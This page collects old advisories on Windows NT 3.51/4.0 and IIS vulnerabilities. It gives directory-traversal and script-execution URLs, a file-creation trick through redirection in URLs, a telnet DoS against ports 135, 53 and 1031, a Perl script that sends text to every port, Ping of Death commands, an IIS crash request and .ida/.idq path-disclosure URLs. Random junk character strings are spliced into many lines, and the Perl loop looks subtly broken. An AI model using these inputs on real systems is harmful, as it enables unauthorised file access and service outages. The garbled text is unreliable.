NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
" |0 p" t* X2 G8 W
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
  G" y- D: a5 ?' [, k3 v0 ]
* Z, q/ i5 h/ y+ l--------------------------------------------------------------------
/ k# _' H2 d! P  |
; n# s7 `7 Q2 {+ w! G2 o3 y受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
: @8 L$ R. I; ?6 S! D  g
If the file 'target.bat' exists, the file will be truncated.
3 M7 l) Q; I* ]" I

: O$ S5 d  }$ p0 ?7 YA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

2 a% \4 r9 }9 `* g% F: d/ d----------------------------------------------------------------------
& [0 v" ]/ L0 p- b% \4 \; R
' V6 n6 k$ C! }( A2 @* y) c9 e受影響系統(tǒng):3.51,4.0
( N( z" [9 u1 m' q9 `# CMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.

The following steps;

) k% c5 ^: |3 M0 iTelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
0 S7 {1 L5 g/ [' lExit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

& d! P# e7 b& oWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
5 N( i2 F+ m) n; S
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

( }& B  e8 @) P6 q; F3 L& nIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
& d( X1 K) G7 a  a$ e7 c
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/
- \, _  j0 p) D/ r
use Socket;
use FileHandle;
require "chat2.pl";

. e0 F: ]8 O# Y+ Q: ]) ?$systemname = $ARGV[0] && shift;
5 S% x8 ^; M" t" E" d
4 @! |- h3 h6 {6 V/ J5 p% e) m$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
& l5 S* w& z4 s- w  a+ ~/ r( Y{
# R% u& l3 t$ t/ w1 p% f$ w: b, q' h

  c2 s4 v' G& Hif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
! e0 y( @" x3 T/ Bnext;
2 g, o) z1 R9 T# `: C, o: E* g$ R}
$fh = chat::open_port($systemname, $port);
, j5 v* _' E5 W- L" U( ?$ A4 e  ichat::print ($fh,"This is about ten characters or more");
7 P1 N5 ?* Z8 K5 V* b( @7 @/ |$ A$ i0 Uif ($verbose) {
3 u, M4 K4 h+ {$ W; Aprint "Trying port: $port\n";
}
8 Y. p9 b4 Y5 H" l  K3 `' Kchat::close($fh);

& Y# t9 H. g  R5 K# H}
3 b. f$ m8 u" u5 h3 _' n4 l) ]5 ]

2 p3 I# Y4 S% ~+ M/*end poke code*/
4 d3 A/ @% e3 {, j3 N" i: G
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
7 X8 C% m( g1 K  X, O* i* a
受影響系統(tǒng):4.0
9 G( o3 N- t( E9 S+ {0 uUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

- c! x8 E- J7 {2 I  l* iThis attack causes Dr. Watson to display an alert window and to log an error:

: E0 B4 Q" _, w5 L% H"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
5 l9 L1 R0 C: k4 E4 O
--------------------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
( }$ k% h9 K3 Z% LLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
( _7 K5 r& g+ s- }( K
$ Z- P- x2 \. @8 r/ zSTOP: 0X0000001E
& ]7 v1 S# M$ a( ]KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
2 }& f% ?- U* Y* L( P* A7 k% P$ ]IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
7 Q1 ?$ J9 D% L7 E: y( h( }
# w: X  r9 {7 g( @0 eNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
/ T9 T, j3 a' j
3 K0 y, }$ y+ a8 v. n7 x4 B--------------------------------------------------------------------------------
' V" h6 Y. P7 T
: |9 n3 M# W+ v2 rMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
, T% d- y- e$ {1 c
2 ~1 g) p' ]6 M$ K! D--------------------------------------------------------
7 A' {. [  e3 X" o( m
% E/ k- g, I8 J! D0 ^% }' n+ ]& tIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server